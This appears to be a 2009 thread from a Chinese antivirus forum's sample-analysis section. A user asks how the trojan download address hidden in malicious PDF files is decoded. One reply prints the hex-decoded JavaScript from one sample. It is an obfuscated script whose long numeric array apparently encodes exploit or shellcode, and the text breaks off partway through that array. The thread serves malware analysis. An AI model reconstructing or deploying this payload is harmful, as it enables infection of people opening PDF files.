收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 pdf (已经得到想要的答案)
返回列表 发新帖
查看: 3539|回复: 7
收起左侧

[可疑文件] pdf (已经得到想要的答案)

[复制链接]
幸福的猪猪
发表于 2009-11-20 12:56:11 | 显示全部楼层 |阅读模式
在某网页随便挑选几个下载,卡巴斯基可以全部查杀。(目的:就是想知道pdf文件中的木马下载地址 是怎么解出来的。)

[ 本帖最后由 幸福的猪猪 于 2009-11-20 14:13 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

中国崛起
发表于 2009-11-20 13:04:49 | 显示全部楼层
上报费尔
回复

举报

adad2008
头像被屏蔽
发表于 2009-11-20 13:26:28 | 显示全部楼层
txt文件的stream内容被加密了

[ 本帖最后由 adad2008 于 2009-11-20 13:33 编辑 ]
回复

举报

250662772
发表于 2009-11-20 13:54:43 | 显示全部楼层
刚开始基本都是用的16进制加密,以abel.pdf为例用记事本打开提取中间的数字先进行16进制解密


得到

var nrsw=false;agkmq='';abfit="";cfit='';dglqsx=24804;wzmte=false;acjnru="acjnru";deglpw="deglpw";vczjbo=false;emqu="emqu";adiqsv=58512;vzat="vzat";jkmoux="jkmoux";var jmnt="",cilnw=46441,ejmpry='',fgkmou=false,bevw="bevw",cwbuz=0,cimv=String,nruw=cimv['fArAoUmsCAhUaArsCsoUdUes'.replace(/[sPkAU]/g,'')],ecbmxz=String,fzrnk=ecbmxz['eZvkaClZ'.replace(/[ZokUC]/g,'')],ahot="67",fmqv="",yszj=[67,65,63,157,171,165,153,171,159,166,164,87,156,160,174,150,159,171,94,176,151,169,169,167,98,87,162,156,164,96,177,68,64,64,63,174,158,160,162,156,86,95,175,152,168,170,166,101,162,156,164,158,170,159,86,97,86,105,86,115,86,163,155,165,95,178,67,65,63,64,63,176,151,169,169,167,86,98,115,87,175,152,168,170,166,114,67,65,63,64,179,68,64,64,63,176,151,169,169,167,86,116,86,176,151,169,169,167,100,170,171,153,169,171,168,160,164,158,94,103,98,87,162,156,164,102,104,96,113,68,64,64,63,169,155,171,171,169,164,87,175,152,168,170,166,114,67,65,63,180,67,65,67,65,63,157,171,165,153,171,159,166,164,87,171,171,159,163,149,167,168,160,164,171,156,95,95,178,67,65,63,64,172,152,168,87,166,152,175,163,165,152,154,87,115,87,171,165,155,170,153,152,166,156,94,89,91,172,123,121,123,112,91,172,102,103,102,104,91,172,107,109,102,103,91,172,119,104,108,107,91,172,102,103,105,103,91,172,102,103,102,103,91,172,106,103,110,121,91,172,110,121,102,122,91,172,103,122,109,103,91,172,110,121,119,123,91,172,102,111,106,103,91,172,121,106,107,124,91,172,110,121,107,108,91,172,110,121,123,122,91,172,102,111,106,108,91,172,105,106,107,105,91,172,121,104,122,105,91,172,102,106,121,105,91,172,103,103,105,105,91,172,110,103,106,103,91,172,102,103,105,111,91,172,124,108,109,108,91,172,121,105,110,121,91,172,107,123,107,120,91,172,102,107,121,105,91,172,107,108,102,103,91,172,123,122,110,121,91,172,107,104,107,104,91,172,107,109,107,106,91,172,108,103,107,110,91,172,107,123,110,121,91,172,105,106,102,111,91,172,110,121,121,103,91,172,102,122,109,108,91,172,124,124,110,121,91,172,109,109,102,106,91,172,110,121,105,122,91,172,109,111,106,124,91,172,121,125,102,106,91,172,107,104,110,121,91,172,107,105,103,122,91,172,107,104,110,121,91,172,107,105,104,107,91,172,109,104,110,121,91,172,106,124,103,107,91,172,109,108,110,112,91,172,110,121,124,122,91,172,104,103,109,104,91,172,124,110,102,106,91,172,106,120,111,112,91,172,106,105,119,123,91,172,105,121,108,103,91,172,124,122,107,108,91,172,102,107,109,108,91,172,121,103,105,106,91,172,105,110,123,121,91,172,124,125,105,106,91,172,106,108,102,106,91,172,111,110,102,122,91,172,121,125,110,121,91,172,109,108,119,124,91,172,104,121,124,123,91,172,106,125,124,112,91,172,123,111,107,104,91,172,124,125,111,107,91,172,124,125,124,125,91,172,121,106,105,121,91,172,109,107,108,104,91,172,123,121,102,105,91,172,110,121,122,112,91,172,102,122,106,108,91,172,107,124,111,105,91,172,124,105,102,106,91,172,123,103,122,104,91,172,121,109,102,106,91,172,121,112,105,106,91,172,120,110,102,125,91,172,107,125,102,111,91,172,123,104,121,104,91,172,102,106,102,105,91,172,102,106,121,120,91,172,110,121,121,125,91,172,102,106,102,104,91,172,110,112,121,105,91,172,124,111,106,108,91,172,110,121,108,104,91,172,124,111,106,108,91,172,107,124,107,125,91,172,121,112,107,121,91,172,107,108,121,106,91,172,123,122,110,121,91,172,123,111,107,104,91,172,124,125,106,112,91,172,124,125,124,125,91,172,108,111,107,103,91,172,108,103,123,111,91,172,102,107,120,125,91,172,108,122,123,111,91,172,124,125,124,125,91,172,105,106,124,125,91,172,107,105,122,105,91,172,124,125,107,105,91,172,102,111,109,108,91,172,122,103,124,125,91,172,106,108,110,112,91,172,110,121,124,122,91,172,124,122,106,108,91,172,121,106,121,112,91,172,110,121,107,108,91,172,110,106,123,122,91,172,102,122,123,122,91,172,106,108,110,123,91,172,107,103,124,107,91,172,106,108,121,109,91,172,109,108,124,107,91,172,106,108,121,109,91,172,109,105,124,108,91,172,106,108,121,109,91,172,108,122,124,109,91,172,106,108,121,109,91,172,108,123,124,110,91,172,106,108,121,109,91,172,108,125,124,111,91,172,106,108,121,109,91,172,108,124,124,112,91,172,106,108,121,109,91,172,104,124,124,120,91,172,106,108,121,109,91,172,108,107,124,121,91,172,106,108,121,109,91,172,108,122,124,122,91,172,106,108,121,109,91,172,108,122,124,123,91,172,106,108,121,109,91,172,102,103,124,124,91,172,119,103,123,111,91,172,124,125,124,125,91,172,107,103,124,125,91,172,107,123,108,111,91,172,103,104,110,120,91,172,123,111,103,109,91,172,124,125,103,108,91,172,124,125,124,125,91,172,121,107,110,106,91,172,110,108,102,122,91,172,109,107,121,103,91,172,108,120,103,108,91,172,108,120,102,103,91,172,124,125,102,103,91,172,102,122,109,108,91,172,109,108,124,125,91,172,108,120,102,111,91,172,124,125,102,103,91,172,110,108,122,103,91,172,109,108,121,103,91,172,106,103,102,106,91,172,121,106,121,112,91,172,121,103,105,106,91,172,121,106,121,112,91,172,105,106,107,110,91,172,110,121,121,103,91,172,104,107,106,122,91,172,110,121,102,122,91,172,104,107,109,122,91,172,124,122,102,111,91,172,119,120,124,106,91,172,121,106,107,125,91,172,106,122,110,121,91,172,102,107,104,107,91,172,105,112,110,103,91,172,110,121,102,103,91,172,109,107,121,104,91,172,106,103,102,109,91,172,105,111,110,103,91,172,109,108,102,103,91,172,104,121,124,120,91,172,121,106,121,104,91,172,110,121,107,108,91,172,110,106,123,122,91,172,108,107,123,122,91,172,110,123,107,106,91,172,124,103,106,108,91,172,105,106,107,110,91,172,107,103,122,121,91,172,106,108,121,109,91,172,108,121,124,103,91,172,106,108,121,109,91,172,108,108,124,104,91,172,106,108,121,109,91,172,109,105,124,105,91,172,106,108,121,109,91,172,108,124,124,106,91,172,106,108,121,109,91,172,108,108,124,107,91,172,106,108,121,109,91,172,108,122,124,108,91,172,106,108,121,109,91,172,105,106,124,109,91,172,106,108,121,109,91,172,105,105,124,110,91,172,106,108,121,109,91,172,104,124,124,111,91,172,106,108,121,109,91,172,108,107,124,112,91,172,106,108,121,109,91,172,108,122,124,120,91,172,106,108,121,109,91,172,108,122,124,121,91,172,107,123,110,111,91,172,123,111,124,122,91,172,124,125,102,121,91,172,124,125,124,125,91,172,108,111,107,103,91,172,106,106,108,111,91,172,110,124,124,112,91,172,110,103,123,111,91,172,124,125,124,124,91,172,110,121,124,125,91,172,110,123,124,111,91,172,111,122,106,108,91,172,106,107,108,120,91,172,123,111,107,103,91,172,124,125,109,124,91,172,124,125,124,125,91,172,106,108,110,123,91,172,108,120,123,103,91,172,107,103,103,103,91,172,109,106,123,111,91,172,124,125,124,125,91,172,110,106,124,125,91,172,103,122,121,107,91,172,106,108,110,123,91,172,107,103,123,103,91,172,106,108,110,123,91,172,107,103,111,122,91,172,107,106,107,106,91,172,107,106,107,106,91,172,107,106,107,106,91,172,109,108,124,125,91,172,121,110,102,111,91,172,111,122,106,108,91,172,102,103,106,107,91,172,102,103,102,103,91,172,124,125,107,106,91,172,107,125,122,110,91,172,120,109,102,125,91,172,107,121,121,103,91,172,121,106,121,112,91,172,110,121,107,108,91,172,107,104,123,122,91,172,107,106,107,104,91,172,107,110,107,109,91,172,106,105,108,120,91,172,109,105,123,111,91,172,102,103,102,103,91,172,110,121,102,103,91,172,105,106,122,111,91,172,110,108,124,109,91,172,107,112,122,121,91,172,106,108,121,110,91,172,108,104,124,111,91,172,108,108,104,124,91,172,121,110,109,111,91,172,124,122,106,108,91,172,102,103,108,108,91,172,102,103,102,103,91,172,107,109,109,124,91,172,106,108,110,123,91,172,107,103,124,111,91,172,123,111,107,109,91,172,102,103,107,104,91,172,102,103,102,103,91,172,107,103,107,112,91,172,120,104,123,111,91,172,124,125,124,124,91,172,110,108,124,125,91,172,107,112,121,103,91,172,109,107,107,112,91,172,110,123,105,112,91,172,102,104,106,109,91,172,123,111,107,103,91,172,102,103,105,121,91,172,102,103,102,103,91,172,124,111,110,121,91,172,106,108,110,123,91,172,107,103,124,111,91,172,104,104,123,111,91,172,124,125,124,125,91,172,110,108,124,125,91,172,107,112,121,103,91,172,109,107,107,112,91,172,107,110,102,122,91,172,102,104,123,111,91,172,124,125,124,125,91,172,107,112,124,125,91,172,106,107,121,109,91,172,124,125,105,111,91,172,107,103,109,106,91,172,106,108,110,123,91,172,124,124,124,111,91,172,107,111,102,103,91,172,106,108,110,123,91,172,107,103,124,111,91,172,123,111,107,110,91,172,124,124,109,107,91,172,124,125,124,125,91,172,107,112,107,112,91,172,106,109,106,109,91,172,124,106,105,121,91,172,119,120,109,122,91,172,107,124,107,125,91,172,121,112,107,121,91,172,107,108,121,106,91,172,123,122,110,121,91,172,107,106,107,104,91,172,108,103,108,109,91,172,105,105,120,104,91,172,102,103,123,111,91,172,102,103,102,103,91,172,107,111,102,103,91,172,102,111,105,111,91,172,102,106,109,107,91,172,123,121,106,103,91,172,106,103,124,112,91,172,107,123,110,121,91,172,110,103,102,111,91,172,106,105,124,121,91,172,102,111,109,108,91,172,122,121,105,106,91,172,103,111,110,120,91,172,121,106,110,121,91,172,103,110,123,121,91,172,103,111,105,111,91,172,103,104,109,109,91,172,105,106,106,103,91,172,110,107,121,112,91,172,109,107,122,121,91,172,106,103,102,122,91,172,102,111,105,111,91,172,124,121,109,108,91,172,124,124,106,103,91,172,123,121,121,121,91,172,105,106,124,105,91,172,110,112,121,103,91,172,124,122,106,108,91,172,106,108,110,121,91,172,107,121,124,122,91,172,121,106,121,112,91,172,102,104,105,105,91,172,109,107,108,111,91,172,109,103,109,107,91,172,104,125,105,120,91,172,108,123,104,125,91,172,109,105,108,112,91,172,108,125,109,105,91,172,108,125,109,105,91,172,108,108,108,124,91,172,108,125,109,105,91,172,108,112,108,109,91,172,108,108,109,109,91,172,108,106,104,124,91,172,108,123,108,125,91,172,109,106,104,125,91,172,108,108,108,122,91,172,109,103,108,108,91,172,108,104,104,125,91,172,108,121,108,109,91,172,109,108,109,103,91,172,104,124,105,105,91,172,109,111,108,108,91,172,102,103,108,108,88,96,113,68,64,64,63,173,151,169,86,165,165,167,86,116,86,172,164,156,169,154,151,167,155,95,88,92,171,103,119,103,119,92,171,103,119,103,119,92,171,103,119,103,119,92,171,103,119,103,119,89,95,68,64,64,63,173,151,169,86,159,155,152,166,153,162,166,153,162,86,116,86,165,165,167,86,98,86,167,151,176,162,166,151,155,113,68,64,64,63,173,151,169,86,153,159,158,152,163,165,154,161,87,115,87,171,165,155,170,153,152,166,156,94,89,91,172,102,120,102,120,91,172,102,120,102,120,88,96,113,68,64,64,63,173,151,169,86,159,155,152,154,156,168,170,159,177,155,87,115,87,104,103,113,68,64,64,63,173,151,169,86,170,166,169,151,176,86,116,86,159,155,152,154,156,168,170,159,177,155,87,97,87,158,156,151,167,152,163,165,154,161,101,162,156,164,158,170,159,113,68,64,64,63,174,158,160,162,156,86,95,152,160,157,153,162,166,153,162,100,163,155,165,157,171,158,87,114,87,169,167,168,152,175,96,177,68,64,64,63,64,152,160,157,153,162,166,153,162,86,98,115,87,152,160,157,153,162,166,153,162,113,68,64,64,63,180,67,65,63,64,172,152,168,87,156,160,162,163,152,163,165,154,161,87,115,87,152,160,157,153,162,166,153,162,100,170,171,153,169,171,168,160,164,158,94,103,98,87,169,167,168,152,175,96,113,68,64,64,63,173,151,169,86,153,162,166,153,162,86,116,86,153,159,158,152,163,165,154,161,101,169,172,152,170,170,169,159,165,157,95,102,99,86,153,159,158,152,163,165,154,161,101,162,156,164,158,170,159,99,170,166,169,151,176,95,114,67,65,63,64,173,159,159,163,155,87,94,153,162,166,153,162,100,163,155,165,157,171,158,98,169,167,168,152,175,87,114,87,102,175,106,103,102,103,102,96,177,68,64,64,63,64,152,163,165,154,161,87,115,87,152,163,165,154,161,87,97,87,152,163,165,154,161,87,97,87,156,160,162,163,152,163,165,154,161,114,67,65,63,64,179,68,64,64,63,173,151,169,86,164,155,164,149,152,168,169,151,176,86,116,86,165,155,174,86,120,168,169,151,176,94,96,113,68,64,64,63,157,165,169,86,95,172,152,168,87,159,87,115,87,102,114,86,160,86,115,86,104,106,103,102,114,86,160,97,98,95,178,67,65,63,64,63,164,155,164,149,152,168,169,151,176,145,160,147,87,115,87,152,163,165,154,161,87,97,87,158,156,151,167,152,163,165,154,161,114,67,65,63,64,179,68,64,64,63,173,151,169,86,165,171,164,86,116,86,104,104,112,111,112,111,112,111,112,111,112,111,112,111,112,111,112,111,112,111,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,111,110,114,67,65,63,64,171,171,159,163,100,167,168,160,164,171,156,95,88,92,106,108,102,103,102,157,88,99,86,165,171,164,95,114,67,65,63,180,67,65,67,65,63,157,171,165,153,171,159,166,164,87,153,166,162,163,151,153,149,156,163,152,159,163,94,96,177,68,64,64,63,173,151,169,86,170,158,156,162,163,153,166,154,156,86,116,86,172,164,156,169,154,151,167,155,95,88,92,171,124,120,124,111,92,171,103,102,103,103,92,171,108,108,103,102,92,171,120,103,109,106,92,171,103,102,106,102,92,171,103,102,103,102,92,171,107,102,111,120,92,171,111,120,103,121,92,171,104,121,110,102,92,171,111,120,120,122,92,171,103,110,107,102,92,171,122,105,108,123,92,171,111,120,108,107,92,171,111,120,124,121,92,171,103,110,107,107,92,171,106,105,108,104,92,171,122,103,123,104,92,171,103,105,122,104,92,171,104,102,106,104,92,171,111,102,107,102,92,171,103,102,106,110,92,171,125,107,110,107,92,171,122,104,111,120,92,171,108,122,108,119,92,171,103,106,122,104,92,171,108,107,103,102,92,171,124,121,111,120,92,171,108,103,108,103,92,171,108,108,108,105,92,171,109,102,108,109,92,171,108,122,111,120,92,171,106,105,103,110,92,171,111,120,122,102,92,171,103,121,110,107,92,171,125,123,111,120,92,171,110,108,103,105,92,171,111,120,106,121,92,171,110,110,107,123,92,171,122,124,103,105,92,171,108,103,111,120,92,171,108,104,104,121,92,171,108,103,111,120,92,171,108,104,105,106,92,171,110,103,111,120,92,171,107,123,104,106,92,171,110,107,111,111,92,171,111,120,125,121,92,171,105,102,110,103,92,171,125,109,103,105,92,171,107,119,112,111,92,171,107,104,120,122,92,171,106,120,109,102,92,171,125,121,108,107,92,171,103,106,110,107,92,171,122,102,106,105,92,171,106,109,124,120,92,171,125,124,106,105,92,171,107,107,103,105,92,171,112,109,103,121,92,171,122,124,111,120,92,171,110,107,120,123,92,171,105,120,125,122,92,171,107,124,125,111,92,171,124,110,108,103,92,171,125,124,112,106,92,171,125,124,125,124,92,171,122,105,106,120,92,171,110,106,109,103,92,171,124,120,103,104,92,171,111,120,123,111,92,171,103,121,107,107,92,171,108,123,112,104,92,171,125,104,103,105,92,171,124,102,123,103,92,171,122,108,103,105,92,171,122,111,106,105,92,171,121,109,103,124,92,171,108,124,103,110,92,171,124,103,122,103,92,171,103,105,103,104,92,171,103,105,122,119,92,171,111,120,122,124,92,171,103,105,103,103,92,171,111,111,122,104,92,171,125,110,107,107,92,171,111,120,109,103,92,171,125,110,107,107,92,171,108,123,108,124,92,171,122,111,108,120,92,171,108,107,122,105,92,171,124,121,111,120,92,171,124,110,108,103,92,171,125,124,107,111,92,171,125,124,125,124,92,171,109,110,108,102,92,171,109,102,124,110,92,171,103,106,121,124,92,171,109,121,124,110,92,171,125,124,125,124,92,171,106,105,125,124,92,171,108,104,123,104,92,171,125,124,108,104,92,171,103,110,110,107,92,171,123,102,125,124,92,171,107,107,111,111,92,171,111,120,125,121,92,171,125,121,107,107,92,171,122,105,122,111,92,171,111,120,108,107,92,171,111,105,124,121,92,171,103,121,124,121,92,171,107,107,111,122,92,171,108,102,125,106,92,171,107,107,122,108,92,171,110,107,125,106,92,171,107,107,122,108,92,171,110,104,125,107,92,171,107,107,122,108,92,171,109,121,125,108,92,171,107,107,122,108,92,171,109,122,125,109,92,171,107,107,122,108,92,171,109,124,125,110,92,171,107,107,122,108,92,171,109,123,125,111,92,171,107,107,122,108,92,171,105,123,125,119,92,171,107,107,122,108,92,171,109,106,125,120,92,171,107,107,122,108,92,171,109,121,125,121,92,171,107,107,122,108,92,171,109,121,125,122,92,171,107,107,122,108,92,171,103,102,125,123,92,171,120,102,124,110,92,171,125,124,125,124,92,171,108,102,125,124,92,171,108,122,109,110,92,171,104,103,111,119,92,171,124,110,104,108,92,171,125,124,104,107,92,171,125,124,125,124,92,171,122,106,111,105,92,171,111,107,103,121,92,171,110,106,122,102,92,171,109,119,104,107,92,171,109,119,103,102,92,171,125,124,103,102,92,171,103,121,110,107,92,171,110,107,125,124,92,171,109,119,103,110,92,171,125,124,103,102,92,171,111,107,123,102,92,171,110,107,122,102,92,171,107,102,103,105,92,171,122,105,122,111,92,171,122,102,106,105,92,171,122,105,122,111,92,171,106,105,108,109,92,171,111,120,122,102,92,171,105,106,107,121,92,171,111,120,103,121,92,171,105,106,110,121,92,171,125,121,103,110,92,171,120,119,125,105,92,171,122,105,108,124,92,171,107,121,111,120,92,171,103,106,105,106,92,171,106,111,111,102,92,171,111,120,103,102,92,171,110,106,122,103,92,171,107,102,103,108,92,171,106,110,111,102,92,171,110,107,103,102,92,171,105,120,125,119,92,171,122,105,122,103,92,171,111,120,108,107,92,171,111,105,124,121,92,171,109,106,124,121,92,171,111,122,108,105,92,171,125,102,107,107,92,171,106,105,108,109,92,171,108,102,123,120,92,171,107,107,122,108,92,171,109,120,125,102,92,171,107,107,122,108,92,171,109,107,125,103,92,171,107,107,122,108,92,171,110,104,125,104,92,171,107,107,122,108,92,171,109,123,125,105,92,171,107,107,122,108,92,171,109,107,125,106,92,171,107,107,122,108,92,171,109,121,125,107,92,171,107,107,122,108,92,171,106,105,125,108,92,171,107,107,122,108,92,171,106,104,125,109,92,171,107,107,122,108,92,171,105,123,125,110,92,171,107,107,122,108,92,171,109,106,125,111,92,171,107,107,122,108,92,171,109,121,125,119,92,171,107,107,122,108,92,171,109,121,125,120,92,171,108,122,111,110,92,171,124,110,125,121,92,171,125,124,103,120,92,171,125,124,125,124,92,171,109,110,108,102,92,171,107,105,109,110,92,171,111,123,125,111,92,171,111,102,124,110,92,171,125,124,125,123,92,171,111,120,125,124,92,171,111,122,125,110,92,171,112,121,107,107,92,171,107,106,109,119,92,171,124,110,108,102,92,171,125,124,110,123,92,171,125,124,125,124,92,171,107,107,111,122,92,171,109,119,124,102,92,171,108,102,104,102,92,171,110,105,124,110,92,171,125,124,125,124,92,171,111,105,125,124,92,171,104,121,122,106,92,171,107,107,111,122,92,171,108,102,124,102,92,171,107,107,111,122,92,171,108,102,112,121,92,171,108,105,108,105,92,171,108,105,108,105,92,171,108,105,108,105,92,171,110,107,125,124,92,171,122,109,103,110,92,171,112,121,107,107,92,171,103,102,107,106,92,171,103,102,103,102,92,171,125,124,108,105,92,171,108,124,123,109,92,171,121,108,103,124,92,171,108,120,122,102,92,171,122,105,122,111,92,171,111,120,108,107,92,171,108,103,124,121,92,171,108,105,108,103,92,171,108,109,108,108,92,171,107,104,109,119,92,171,110,104,124,110,92,171,103,102,103,102,92,171,111,120,103,102,92,171,106,105,123,110,92,171,111,107,125,108,92,171,108,111,123,120,92,171,107,107,122,109,92,171,109,103,125,110,92,171,109,107,105,123,92,171,122,109,110,110,92,171,125,121,107,107,92,171,103,102,109,107,92,171,103,102,103,102,92,171,108,108,110,123,92,171,107,107,111,122,92,171,108,102,125,110,92,171,124,110,108,108,92,171,103,102,108,103,92,171,103,102,103,102,92,171,108,102,108,111,92,171,121,103,124,110,92,171,125,124,125,123,92,171,111,107,125,124,92,171,108,111,122,102,92,171,110,106,108,111,92,171,111,122,106,111,92,171,103,103,107,108,92,171,124,110,108,102,92,171,103,102,106,120,92,171,103,102,103,102,92,171,125,110,111,120,92,171,107,107,111,122,92,171,108,102,125,110,92,171,105,103,124,110,92,171,125,124,125,124,92,171,111,107,125,124,92,171,108,111,122,102,92,171,110,106,108,111,92,171,108,109,103,121,92,171,103,103,124,110,92,171,125,124,125,124,92,171,108,111,125,124,92,171,107,106,122,108,92,171,125,124,106,110,92,171,108,102,110,105,92,171,107,107,111,122,92,171,125,123,125,110,92,171,108,110,103,102,92,171,107,107,111,122,92,171,108,102,125,110,92,171,124,110,108,109,92,171,125,123,110,106,92,171,125,124,125,124,92,171,108,111,108,111,92,171,107,108,107,108,92,171,125,105,106,120,92,171,120,119,110,121,92,171,108,123,108,124,92,171,122,111,108,120,92,171,108,107,122,105,92,171,124,121,111,120,92,171,108,105,108,103,92,171,109,102,109,108,92,171,106,104,121,103,92,171,103,102,124,110,92,171,103,102,103,102,92,171,108,110,103,102,92,171,103,110,106,110,92,171,103,105,110,106,92,171,124,120,107,102,92,171,107,102,125,111,92,171,108,122,111,120,92,171,111,102,103,110,92,171,107,104,125,120,92,171,103,110,110,107,92,171,123,120,106,105,92,171,104,110,111,119,92,171,122,105,111,120,92,171,104,109,124,120,92,171,104,110,106,110,92,171,104,103,110,108,92,171,106,105,107,102,92,171,111,106,122,111,92,171,110,106,123,120,92,171,107,102,103,121,92,171,103,110,106,110,92,171,125,120,110,107,92,171,125,123,107,102,92,171,124,120,122,120,92,171,106,105,125,104,92,171,111,111,122,102,92,171,125,121,107,107,92,171,107,107,111,120,92,171,108,120,125,121,92,171,122,105,122,111,92,171,103,103,106,104,92,171,110,106,109,110,92,171,110,102,110,106,92,171,105,124,106,119,92,171,109,122,105,124,92,171,110,104,109,111,92,171,109,124,110,104,92,171,109,124,110,104,92,171,109,107,109,123,92,171,109,124,110,104,92,171,109,111,109,108,92,171,109,107,110,108,92,171,109,105,105,123,92,171,109,122,109,124,92,171,110,105,105,124,92,171,109,107,109,121,92,171,110,102,109,107,92,171,109,103,105,124,92,171,109,109,109,105,92,171,110,108,109,123,92,171,106,104,110,109,92,171,109,107,105,123,92,171,109,107,110,110,92,171,103,102,103,102,89,95,114,67,65,63,64,172,152,168,87,163,156,163,150,151,169,168,152,175,87,115,87,164,156,173,87,119,169,168,152,175,95,95,114,67,65,63,64,172,152,168,87,153,154,86,116,86,103,174,103,153,103,153,103,153,103,153,114,67,65,63,64,172,152,168,87,151,155,154,169,86,116,86,103,174,107,102,103,102,103,102,114,67,65,63,64,172,152,168,87,169,154,149,163,155,165,86,116,86,170,158,156,162,163,153,166,154,156,100,163,155,165,157,171,158,87,96,87,104,114,67,65,63,64,172,152,168,87,162,156,164,87,115,87,151,155,154,169,86,100,86,95,169,154,149,163,155,165,97,103,174,106,110,96,113,68,64,64,63,173,151,169,86,176,151,169,169,167,86,116,86,172,164,156,169,154,151,167,155,95,88,92,171,112,102,112,102,92,171,112,102,112,102,89,95,114,67,65,63,64,175,152,168,170,166,87,115,87,156,160,174,150,159,171,94,176,151,169,169,167,98,87,162,156,164,96,113,68,64,64,63,173,151,169,86,154,165,172,164,171,104,87,115,87,94,154,153,87,99,87,102,175,106,103,102,103,102,103,95,102,151,155,154,169,113,68,64,64,63,157,165,169,86,95,172,152,168,87,153,166,171,165,170,87,115,87,102,114,86,154,165,172,164,171,86,115,86,154,165,172,164,171,104,114,86,154,165,172,164,171,97,98,95,178,67,65,63,64,63,164,155,164,149,152,168,169,151,176,145,154,165,172,164,171,147,87,115,87,175,152,168,170,166,87,97,87,169,159,155,163,162,154,165,155,155,114,67,65,63,64,179,68,64,64,63,173,151,169,86,166,172,156,168,157,162,166,173,87,115,87,171,165,155,170,153,152,166,156,94,89,91,172,102,154,102,154,91,172,102,154,102,154,88,96,113,68,64,64,63,174,158,160,162,156,86,95,165,173,155,169,156,163,165,174,100,163,155,165,157,171,158,87,114,87,106,107,111,108,104,96,177,68,64,64,63,64,165,173,155,169,156,163,165,174,86,98,115,87,165,173,155,169,156,163,165,174,113,68,64,64,63,180,67,65,63,64,170,159,159,170,100,154,165,163,162,152,152,138,170,166,168,156,86,116,86,122,165,163,162,152,152,101,153,166,162,163,155,154,170,124,163,152,159,163,127,165,156,166,94,178,169,172,152,161,112,87,88,89,98,164,169,158,112,87,165,173,155,169,156,163,165,174,179,96,113,68,64,64,179,68,64,68,64,64,156,172,164,154,170,160,165,165,86,154,165,163,162,152,152,150,157,156,170,160,153,166,164,95,95,178,67,65,63,64,159,157,86,95,151,167,166,101,154,166,153,101,121,166,162,163,151,153,100,158,155,171,127,154,165,165,95,178,67,65,63,64,63,173,151,169,86,152,168,169,175,87,115,87,164,156,173,87,119,169,168,152,175,95,95,114,67,65,63,64,63,173,151,169,86,173,172,167,155,171,158,176,151,87,115,87,171,165,155,170,153,152,166,156,94,89,91,172,123,121,123,112,91,172,102,103,102,104,91,172,107,109,102,103,91,172,119,104,108,107,91,172,102,103,105,103,91,172,102,103,102,103,91,172,106,103,110,121,91,172,110,121,102,122,91,172,103,122,109,103,91,172,110,121,119,123,91,172,102,111,106,103,91,172,121,106,107,124,91,172,110,121,107,108,91,172,110,121,123,122,91,172,102,111,106,108,91,172,105,106,107,105,91,172,121,104,122,105,91,172,102,106,121,105,91,172,103,103,105,105,91,172,110,103,106,103,91,172,102,103,105,111,91,172,124,108,109,108,91,172,121,105,110,121,91,172,107,123,107,120,91,172,102,107,121,105,91,172,107,108,102,103,91,172,123,122,110,121,91,172,107,104,107,104,91,172,107,109,107,106,91,172,108,103,107,110,91,172,107,123,110,121,91,172,105,106,102,111,91,172,110,121,121,103,91,172,102,122,109,108,91,172,124,124,110,121,91,172,109,109,102,106,91,172,110,121,105,122,91,172,109,111,106,124,91,172,121,125,102,106,91,172,107,104,110,121,91,172,107,105,103,122,91,172,107,104,110,121,91,172,107,105,104,107,91,172,109,104,110,121,91,172,106,124,103,107,91,172,109,108,110,112,91,172,110,121,124,122,91,172,104,103,109,104,91,172,124,110,102,106,91,172,106,120,111,112,91,172,106,105,119,123,91,172,105,121,108,103,91,172,124,122,107,108,91,172,102,107,109,108,91,172,121,103,105,106,91,172,105,110,123,121,91,172,124,125,105,106,91,172,106,108,102,106,91,172,111,110,102,122,91,172,121,125,110,121,91,172,109,108,119,124,91,172,104,121,124,123,91,172,106,125,124,112,91,172,123,111,107,104,91,172,124,125,111,107,91,172,124,125,124,125,91,172,121,106,105,121,91,172,109,107,108,104,91,172,123,121,102,105,91,172,110,121,122,112,91,172,102,122,106,108,91,172,107,124,111,105,91,172,124,105,102,106,91,172,123,103,122,104,91,172,121,109,102,106,91,172,121,112,105,106,91,172,120,110,102,125,91,172,107,125,102,111,91,172,123,104,121,104,91,172,102,106,102,105,91,172,102,106,121,120,91,172,110,121,121,125,91,172,102,106,102,104,91,172,110,112,121,105,91,172,124,111,106,108,91,172,110,121,108,104,91,172,124,111,106,108,91,172,107,124,107,125,91,172,121,112,107,121,91,172,107,108,121,106,91,172,123,122,110,121,91,172,123,111,107,104,91,172,124,125,106,112,91,172,124,125,124,125,91,172,108,111,107,103,91,172,108,103,123,111,91,172,102,107,120,125,91,172,108,122,123,111,91,172,124,125,124,125,91,172,105,106,124,125,91,172,107,105,122,105,91,172,124,125,107,105,91,172,102,111,109,108,91,172,122,103,124,125,91,172,106,108,110,112,91,172,110,121,124,122,91,172,124,122,106,108,91,172,121,106,121,112,91,172,110,121,107,108,91,172,110,106,123,122,91,172,102,122,123,122,91,172,106,108,110,123,91,172,107,103,124,107,91,172,106,108,121,109,91,172,109,108,124,107,91,172,106,108,121,109,91,172,109,105,124,108,91,172,106,108,121,109,91,172,108,122,124,109,91,172,106,108,121,109,91,172,108,123,124,110,91,172,106,108,121,109,91,172,108,125,124,111,91,172,106,108,121,109,91,172,108,124,124,112,91,172,106,108,121,109,91,172,104,124,124,120,91,172,106,